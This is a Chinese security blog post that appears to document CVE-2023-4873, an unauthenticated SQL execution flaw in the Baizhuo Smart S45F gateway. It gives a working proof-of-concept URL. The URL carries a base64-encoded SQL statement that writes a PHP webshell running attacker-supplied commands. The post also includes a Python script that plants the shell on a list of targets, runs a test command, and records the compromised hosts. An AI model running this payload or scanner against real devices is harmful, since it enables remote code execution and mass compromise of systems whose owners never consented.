北京百卓智能S45F多业务安全网关智能管理平台 未授权SQL执行导致RCE CVE-2023-4873

漏洞信息·网络安全 · 2023-09-16 · 871 人浏览

原理

SQL语句执行接口未授权访问,可执行任意SQL语句。

影响范围

Smart S45F

危害

远程攻击者可利用该漏洞执行任意SQL语句,包括写入webshell。

POC & EXP

手工

漏洞位置:https://ip:port/importexport.php
该接口可以使用GET参数执行SQL语句

参数sql=base64编码的SQL语句
参数type=exportexcelbysql,执行动作

POC:
1

https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql

base64: select 0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e into outfile '/usr/hddocs/nsg/app/sec.php'

hex: <?php echo system($_POST["cmd"]);?>

一句话地址:https://ip:port/app/sec.php

脚本

import requests

proxies = {
'http': 'http://127.0.0.1:7890',
'https': 'http://127.0.0.1:7890'
}

url = []
with open("order.txt", "r") as file:
    url = file.readlines()

file = open("get.txt", "w")
for i in url:
    try:
        response = requests.get(i + '/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql', proxies=proxies)
        if response.status_code == 200:
            response = requests.post(i + '/app/sec.php', data={'cmd': 'ipconfig'}, proxies=proxies)
            if response.status_code == 200 and ("eth" in response.text):
                print("get it!" + i)
                file.write(i)
        else:
            print(str(response.status_code) + ": " + response.text)
    except:
        pass
file.close()

参考链接

https://github.com/cugerQDHJ/cve/blob/main/rce.md

未授权访问 RCE 2023年 SQL 871 Views
2023 - 2024 Equinox 交界线. All Rights Reserved.
本站已在互联网运行了 Theme Jasmine by Kent Liao